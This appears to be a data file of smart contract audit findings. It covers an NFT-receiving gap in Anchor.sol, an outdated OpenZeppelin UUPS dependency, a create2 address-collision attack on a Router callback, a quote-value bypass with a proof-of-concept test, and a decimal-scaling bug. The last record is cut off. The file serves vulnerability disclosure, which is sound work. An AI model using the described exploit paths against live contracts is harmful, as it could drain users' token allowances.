any kindчmediumчAnchor.sol essentially works like a wallet, and also attached to profile to give it extra credibility and profile owner more functionality.\\nAs intended this contract will receive nfts, from different strategies and protocols. However, as it is currently implemented thee contracts will not be able to receive NFTs sent with safeTransferFrom(), because they do not implement the necessary functions to safely receive these tokens..\\nWhile in many cases such a situation would be Medium severity, looking at these wallets will be used could lead to more serious consequences. For example, having an anchor that is entitled to high value NFTs but is not able to receive them is clearly a loss of funds risk, and a High severity issue.\\nimplement the onERC721Received() and onERC1155Received() functions in following code:\\n```\\n// SPDX-License-Identifier: AGPL-3.0-only\\npragma solidity 0.8.19;\\n\\n// Core Contracts\\nimport {Registry} from \"./Registry.sol\";\\n\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⢿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⡟⠘⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⣀⣴⣾⣿⣿⣿⣿⣾⠻⣿⣿⣿⣿⣿⣿⣿⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⡿⠀⠀⠸⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⢀⣠⣴⣴⣶⣶⣶⣦⣦⣀⡀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⣴⣿⣿⣿⣿⣿⣿⡿⠃⠀⠙⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⠁⠀⠀⠀⢻⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⡀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀⠘⣿⣿⣿⣿⣿⡿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⠃⠀⠀⠀⠀⠈⢿⣿⣿⣿⣆⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⣰⣿⣿⣿⡿⠋⠁⠀⠀⠈⠘⠹⣿⣿⣿⣿⣆⠀⠀⠀\\n// ⠀⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⡿⠀⠀⠀⠀⠀⠀⠈⢿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣾⣿⣿⣿⠏⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⢰⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⡀⠀⠀\\n// ⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣟⠀⡀⢀⠀⡀⢀⠀⡀⢈⢿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⡇⠀⠀\\n// ⠀⠀⣠⣿⣿⣿⣿⣿⣿⡿⠋⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⡿⢿⠿⠿⠿⠿⠿⠿⠿⠿⠿⢿⣿⣿⣿⣷⡀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠸⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⠂⠀⠀\\n// ⠀⠀⠙⠛⠿⠻⠻⠛⠉⠀⠀⠈⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢿⣿⣿⣿⣧⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⢻⣿⣿⣿⣷⣀⢀⠀⠀⠀⡀⣰⣾⣿⣿⣿⠏⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠛⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⣿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣧⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠹⢿⣿⣿⣿⣿⣾⣾⣷⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⠙⠋⠛⠙⠋⠛⠙⠋⠛⠙⠋⠃⠀⠀⠀⠀⠀⠀⠀⠀⠠⠿⠻⠟⠿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⠟⠿⠟⠿⠆⠀⠸⠿⠿⠟⠯⠀⠀⠀⠸⠿⠿⠿⠏⠀⠀⠀⠀⠀⠈⠉⠻⠻⡿⣿⢿⡿⡿⠿⠛⠁⠀⠀⠀⠀⠀⠀\\n// allo.gitcoin.co\\n\\n/// @title Anchor contract\\n/// @author @thelostone-mc , @0xKurt , @codenamejason , @0xZakk , @nfrgosselin \\n/// @notice Anchors are associated with profiles and are accessible exclusively by the profile owner. This contract ensures secure\\n/// and authorized interaction with external addresses, enhancing the capabilities of profiles and enabling controlled\\n/// execution of operations. The contract leverages the `Registry` contract for ownership verification and access control.\\ncontract Anchor {\\n /// ==========================\\n /// === Storage Variables ====\\n /// ==========================\\n\\n /// @notice The registry contract on any given network/chain\\n Registry public immutable registry;\\n\\n /// @notice The profileId of the allowed profile to execute calls\\n bytes32 public immutable profileId;\\n\\n /// ==========================\\n /// ======== Errors ==========\\n /// ==========================\\n\\n /// @notice Throws when the caller is not the owner of the profile\\n error UNAUTHORIZED();\\n\\n /// @notice Throws when the call to the target address fails\\n error CALL_FAILED();\\n\\n /// ==========================\\n /// ======= Constructor ======\\n /// ==========================\\n\\n /// @notice Constructor\\n /// @dev We create an instance of the 'Registry' contract using the 'msg.sender' and set the profileId.\\n /// @param _profileId The ID of the allowed profile to execute calls\\n constructor(bytes32 _profileId) {\\n registry = Registry(msg.sender);\\n profileId = _profileId;\\n }\\n\\n /// ==========================\\n /// ======== External ========\\n /// ==========================\\n\\n /// @notice Execute a call to a target address\\n /// @dev 'msg.sender' must be profile owner\\n /// @param _target The target address to call\\n /// @param _value The amount of native token to send\\n /// @param _data The data to send to the target address\\n /// @return Data returned from the target address\\n function execute(address _target, uint256 _value, bytes memory _data) external returns (bytes memory) {\\n // Check if the caller is the owner of the profile and revert if not\\n if (!registry.isOwnerOfProfile(profileId, msg.sender)) revert UNAUTHORIZED();\\n\\n // Check if the target address is the zero address and revert if it is\\n if (_target == address(0)) revert CALL_FAILED();\\n\\n // Call the target address and return the data\\n (bool success, bytes memory data) = _target.call{value: _value}(_data);\\n\\n // Check if the call was successful and revert if not\\n if (!success) revert CALL_FAILED();\\n\\n return data;\\n }\\n\\n /// @notice This contract should be able to receive native token\\n receive() external payable {}\\n}\\n```\\nчimplement the onERC721Received() and onERC1155Received() functionsчAny time an ERC721 or ERC1155 is attempted to be transferred with safeTransferFrom() or minted with safeMint(), the call will fail.ч```\\n// SPDX-License-Identifier: AGPL-3.0-only\\npragma solidity 0.8.19;\\n\\n// Core Contracts\\nimport {Registry} from \"./Registry.sol\";\\n\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⢿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⡟⠘⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⣀⣴⣾⣿⣿⣿⣿⣾⠻⣿⣿⣿⣿⣿⣿⣿⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⡿⠀⠀⠸⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⢀⣠⣴⣴⣶⣶⣶⣦⣦⣀⡀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⣴⣿⣿⣿⣿⣿⣿⡿⠃⠀⠙⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⠁⠀⠀⠀⢻⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⡀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀⠘⣿⣿⣿⣿⣿⡿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⠃⠀⠀⠀⠀⠈⢿⣿⣿⣿⣆⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⣰⣿⣿⣿⡿⠋⠁⠀⠀⠈⠘⠹⣿⣿⣿⣿⣆⠀⠀⠀\\n// ⠀⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⡿⠀⠀⠀⠀⠀⠀⠈⢿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣾⣿⣿⣿⠏⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⢰⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⡀⠀⠀\\n// ⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣟⠀⡀⢀⠀⡀⢀⠀⡀⢈⢿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⡇⠀⠀\\n// ⠀⠀⣠⣿⣿⣿⣿⣿⣿⡿⠋⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⡿⢿⠿⠿⠿⠿⠿⠿⠿⠿⠿⢿⣿⣿⣿⣷⡀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠸⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⠂⠀⠀\\n// ⠀⠀⠙⠛⠿⠻⠻⠛⠉⠀⠀⠈⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢿⣿⣿⣿⣧⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⢻⣿⣿⣿⣷⣀⢀⠀⠀⠀⡀⣰⣾⣿⣿⣿⠏⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠛⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⣿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣧⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠹⢿⣿⣿⣿⣿⣾⣾⣷⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⠙⠋⠛⠙⠋⠛⠙⠋⠛⠙⠋⠃⠀⠀⠀⠀⠀⠀⠀⠀⠠⠿⠻⠟⠿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⠟⠿⠟⠿⠆⠀⠸⠿⠿⠟⠯⠀⠀⠀⠸⠿⠿⠿⠏⠀⠀⠀⠀⠀⠈⠉⠻⠻⡿⣿⢿⡿⡿⠿⠛⠁⠀⠀⠀⠀⠀⠀\\n// allo.gitcoin.co\\n\\n/// @title Anchor contract\\n/// @author @thelostone-mc , @0xKurt , @codenamejason , @0xZakk , @nfrgosselin \\n/// @notice Anchors are associated with profiles and are accessible exclusively by the profile owner. This contract ensures secure\\n/// and authorized interaction with external addresses, enhancing the capabilities of profiles and enabling controlled\\n/// execution of operations. The contract leverages the `Registry` contract for ownership verification and access control.\\ncontract Anchor {\\n /// ==========================\\n /// === Storage Variables ====\\n /// ==========================\\n\\n /// @notice The registry contract on any given network/chain\\n Registry public immutable registry;\\n\\n /// @notice The profileId of the allowed profile to execute calls\\n bytes32 public immutable profileId;\\n\\n /// ==========================\\n /// ======== Errors ==========\\n /// ==========================\\n\\n /// @notice Throws when the caller is not the owner of the profile\\n error UNAUTHORIZED();\\n\\n /// @notice Throws when the call to the target address fails\\n error CALL_FAILED();\\n\\n /// ==========================\\n /// ======= Constructor ======\\n /// ==========================\\n\\n /// @notice Constructor\\n /// @dev We create an instance of the 'Registry' contract using the 'msg.sender' and set the profileId.\\n /// @param _profileId The ID of the allowed profile to execute calls\\n constructor(bytes32 _profileId) {\\n registry = Registry(msg.sender);\\n profileId = _profileId;\\n }\\n\\n /// ==========================\\n /// ======== External ========\\n /// ==========================\\n\\n /// @notice Execute a call to a target address\\n /// @dev 'msg.sender' must be profile owner\\n /// @param _target The target address to call\\n /// @param _value The amount of native token to send\\n /// @param _data The data to send to the target address\\n /// @return Data returned from the target address\\n function execute(address _target, uint256 _value, bytes memory _data) external returns (bytes memory) {\\n // Check if the caller is the owner of the profile and revert if not\\n if (!registry.isOwnerOfProfile(profileId, msg.sender)) revert UNAUTHORIZED();\\n\\n // Check if the target address is the zero address and revert if it is\\n if (_target == address(0)) revert CALL_FAILED();\\n\\n // Call the target address and return the data\\n (bool success, bytes memory data) = _target.call{value: _value}(_data);\\n\\n // Check if the call was successful and revert if not\\n if (!success) revert CALL_FAILED();\\n\\n return data;\\n }\\n\\n /// @notice This contract should be able to receive native token\\n receive() external payable {}\\n}\\n```\\n -UUPSUpgradeable vulnerability in OpenZeppelin ContractsчmediumчOpenzeppelin has found the critical severity bug in UUPSUpgradeable. The kyber-swap contracts has used both openzeppelin contracts as well as openzeppelin upgrabable contracts with version v4.3.1. This is confirmed from package.json.\\n```\\nFile: ks-elastic-sc/package.json\\n\\n \"@openzeppelin/contracts\": \"4.3.1\",\\n \"@openzeppelin/test-helpers\": \"0.5.6\",\\n \"@openzeppelin/contracts-upgradeable\": \"4.3.1\",\\n```\\n\\nThe `UUPSUpgradeable` vulnerability has been found in openzeppelin version as follows,\\n@openzeppelin/contracts : Affected versions >= 4.1.0 < 4.3.2 @openzeppelin/contracts-upgradeable : >= 4.1.0 < 4.3.2\\nHowever, openzeppelin has fixed this issue in versions 4.3.2\\nOpenzeppelin bug acceptance and fix: check here\\nThe following contracts has been affected due to this vulnerability\\nPoolOracle.sol\\nTokenPositionDescriptor.sol\\nBoth of these contracts are UUPSUpgradeable and the issue must be fixed.чUpdate the openzeppelin library to latest version.\\nCheck this openzeppelin security advisory to initialize the UUPS implementation contracts.\\nCheck this openzeppelin UUPS documentation.чUpgradeable contracts using UUPSUpgradeable may be vulnerable to an attack affecting uninitialized implementation contracts.ч```\\nFile: ks-elastic-sc/package.json\\n\\n \"@openzeppelin/contracts\": \"4.3.1\",\\n \"@openzeppelin/test-helpers\": \"0.5.6\",\\n \"@openzeppelin/contracts-upgradeable\": \"4.3.1\",\\n```\\n -Router.sol is vulnerable to address collissionчmediumчThe pool address check in the the callback function isn't strict enough and can suffer issues with collision. Due to the truncated nature of the create2 opcode the collision resistance is already impaired to 2^160 as that is total number of possible hashes after truncation. Obviously if you are searching for a single hash, this is (basically) impossible. The issue here is that one does not need to search for a single address as the router never verifies that the pool actually exists. This is the crux of the problem, but first let's do a little math as to why this is a problem.\\n$$ 1 - e ^ {-k(k-1) \\over 2N } $$\\nWhere k is the number of hash values and N is the number of possible hashes\\nFor very large numbers we can further approximate the exponent to:\\n$$ -k^2 \\over 2N $$\\nThis exponent is now trivial to solve for an approximate attack value which is:\\n$$ k = \\sqrt{2N} $$\\nIn our scenario N is 2^160 (our truncated keccak256) which means that our approximate attack value is 2^80 since we need to generate two sets of hashes. The first set is to generate 2^80 public addresses and the second is to generate pool address from variations in the pool specifics(token0, token1, fee). Here we reach a final attack value of 2^81 hashes. Using the provided calculator we see that 2^81 hashes has an approximate 86.4% chance of a collision. Increase that number to 2^82 and the odds of collision becomes 99.96%. In this case, a collision between addresses means breaking this check and draining the allowances of all users to a specific token. This is because the EOA address will collide with the supposed pool address allowing it to bypass the msg.sender check. Now we considered the specific of the contract.\\nRouter.sol#L47-L51\\n```\\nrequire(\\n msg.sender == address(_getPool(tokenIn, tokenOut, fee)),\\n 'Router: invalid callback sender'\\n);\\n```\\n\\nThe above snippet from the swapCallback function is used to verify that msg.sender is the address of the pool.\\nRouter.sol#L224-L231\\n```\\nfunction _getPool(\\n address tokenA,\\n address tokenB,\\n uint24 fee\\n) private view returns (IPool) {\\n return IPool(PoolAddress.computeAddress(factory, tokenA, tokenB, fee, poolInitHash));\\n}\\n```\\n\\nWe see that these lines never check with the factory that the pool exists or any of the inputs are valid in any way. token0 can be constant and we can achieve the variation in the hash by changing token1. The attacker could use token0 = WETH and vary token1. This would allow them to steal all allowances of WETH. Since allowances are forever until revoked, this could put hundreds of millions of dollars at risk.\\nAlthough this would require a large amount of compute it is already possible to break with current computing. Given the enormity of the value potentially at stake it would be a lucrative attack to anyone who could fund it. In less than a decade this would likely be a fairly easily attained amount of compute, nearly guaranteeing this attack.чVerify with the factory that msg.sender is a valid poolчAddress collision can cause all allowances to be drainedч```\\nrequire(\\n msg.sender == address(_getPool(tokenIn, tokenOut, fee)),\\n 'Router: invalid callback sender'\\n);\\n```\\n -Position value can fall below minimum acceptable quote value when partially closing positions requested to be closed in fullчmediumчIn `LibQuote.closeQuote` there is a requirement to have the remaining quote value to not be less than minAcceptableQuoteValue:\\n```\\nif (LibQuote.quoteOpenAmount(quote) != quote.quantityToClose) {\\n require(quote.lockedValues.total() >= symbolLayout.symbols[quote.symbolId].minAcceptableQuoteValue,\\n \"LibQuote: Remaining quote value is low\");\\n}\\n```\\n\\nNotice the condition when this require happens:\\n`LibQuote.quoteOpenAmount(quote)` is remaining open amount\\n`quote.quantityToClose` is requested amount to close\\nThis means that this check is ignored if partyA has requested to close amount equal to full remaining quote value, but enforced when it's not (even if closing fully). For example, a quote with opened amount = 100 is requested to be closed in full (amount = 100): this check is ignored. But PartyB can fill the request partially, for example fill 99 out of 100, and the remainder (1) is not checked to confirm to `minAcceptableQuoteValue`.\\nThe following execution paths are possible if PartyA has open position size = 100 and `minAcceptableQuoteValue` = 5:\\n`requestToClosePosition(99)` -> revert\\n`requestToClosePosition(100)` -> `fillCloseRequest(99)` -> pass (remaining quote = 1)чThe condition should be to ignore the `minAcceptableQuoteValue` if request is filled in full (filledAmount == quantityToClose):\\n```\\n- if (LibQuote.quoteOpenAmount(quote) != quote.quantityToClose) {\\n+ if (filledAmount != quote.quantityToClose) {\\n require(quote.lockedValues.total() >= symbolLayout.symbols[quote.symbolId].minAcceptableQuoteValue,\\n \"LibQuote: Remaining quote value is low\");\\n }\\n```\\nчThere can be multiple reasons why the protocol enforces `minAcceptableQuoteValue`, one of them might be the efficiency of the liquidation mechanism: when quote value is too small (and liquidation value too small too), liquidators will not have enough incentive to liquidate these positions in case they become insolvent. Both partyA and partyB might also not have enough incentive to close or respond to request to close such small positions, possibly resulting in a loss of funds and greater market risk for either user.\\nProof of Concept\\nAdd this to any test, for example to `ClosePosition.behavior.ts`.\\n```\\nit(\"Close position with remainder below minAcceptableQuoteValue\", async function () {\\n const context: RunContext = this.context;\\n\\n this.user_allocated = decimal(1000);\\n this.hedger_allocated = decimal(1000);\\n\\n this.user = new User(this.context, this.context.signers.user);\\n await this.user.setup();\\n await this.user.setBalances(this.user_allocated, this.user_allocated, this.user_allocated);\\n\\n this.hedger = new Hedger(this.context, this.context.signers.hedger);\\n await this.hedger.setup();\\n await this.hedger.setBalances(this.hedger_allocated, this.hedger_allocated);\\n\\n await this.user.sendQuote(limitQuoteRequestBuilder()\\n .quantity(decimal(100))\\n .price(decimal(1))\\n .cva(decimal(10)).lf(decimal(5)).mm(decimal(15))\\n .build()\\n );\\n await this.hedger.lockQuote(1, 0, decimal(5, 17));\\n await this.hedger.openPosition(1, limitOpenRequestBuilder().filledAmount(decimal(100)).openPrice(decimal(1)).price(decimal(1)).build());\\n\\n // now try to close full position (100)\\n await this.user.requestToClosePosition(\\n 1,\\n limitCloseRequestBuilder().quantityToClose(decimal(100)).closePrice(decimal(1)).build(),\\n );\\n\\n // now partyA cancels request\\n //await this.user.requestToCancelCloseRequest(1);\\n\\n // partyB can fill 99\\n await this.hedger.fillCloseRequest(\\n 1,\\n limitFillCloseRequestBuilder()\\n .filledAmount(decimal(99))\\n .closedPrice(decimal(1))\\n .build(),\\n );\\n\\n var q = await context.viewFacet.getQuote(1);\\n console.log(\"quote quantity: \" + q.quantity.div(decimal(1)) + \" closed: \" + q.closedAmount.div(decimal(1)));\\n\\n});\\n```\\n\\nConsole execution result:\\n```\\nquote quantity: 100 closed: 99\\n```\\nч```\\nif (LibQuote.quoteOpenAmount(quote) != quote.quantityToClose) {\\n require(quote.lockedValues.total() >= symbolLayout.symbols[quote.symbolId].minAcceptableQuoteValue,\\n \"LibQuote: Remaining quote value is low\");\\n}\\n```\\n -MultiAccount `depositAndAllocateForAccount` function doesn't scale the allocated amount correctly, failing to allocate enough fundsчmediumчInternal accounting (allocatedBalances) are tracked as fixed numbers with 18 decimals, while collateral tokens can have different amount of decimals. This is correctly accounted for in AccountFacet.depositAndAllocate:\\n```\\n AccountFacetImpl.deposit(msg.sender, amount);\\n uint256 amountWith18Decimals = (amount * 1e18) /\\n (10 ** IERC20Metadata(GlobalAppStorage.layout().collateral).decimals());\\n AccountFacetImpl.allocate(amountWith18Decimals);\\n```\\n\\nBut it is treated incorrectly in MultiAccount.depositAndAllocateForAccount:\\n```\\n ISymmio(symmioAddress).depositFor(account, amount);\\n bytes memory _callData = abi.encodeWithSignature(\\n \"allocate(uint256)\",\\n amount\\n );\\n innerCall(account, _callData);\\n```\\n\\nThis leads to incorrect allocated amounts.чScale amount correctly before allocating it:\\n```\\n ISymmio(symmioAddress).depositFor(account, amount);\\n+ uint256 amountWith18Decimals = (amount * 1e18) /\\n+ (10 ** IERC20Metadata(collateral).decimals());\\n bytes memory _callData = abi.encodeWithSignature(\\n \"allocate(uint256)\",\\n- amount\\n+ amountWith18Decimals\\n );\\n innerCall(account, _callData);\\n```\\nчSimilar to 222 from previous audit contest, the user expects to have full amount deposited and allocated, but ends up with only dust amount allocated, which can lead to unexpected liquidations (for example, user is at the edge of liquidation, calls depositAndAllocate to improve account health, but is liquidated instead). For consistency reasons, since this is almost identical to 222, it should also be high.ч```\\n AccountFacetImpl.deposit(msg.sender, amount);\\n uint256 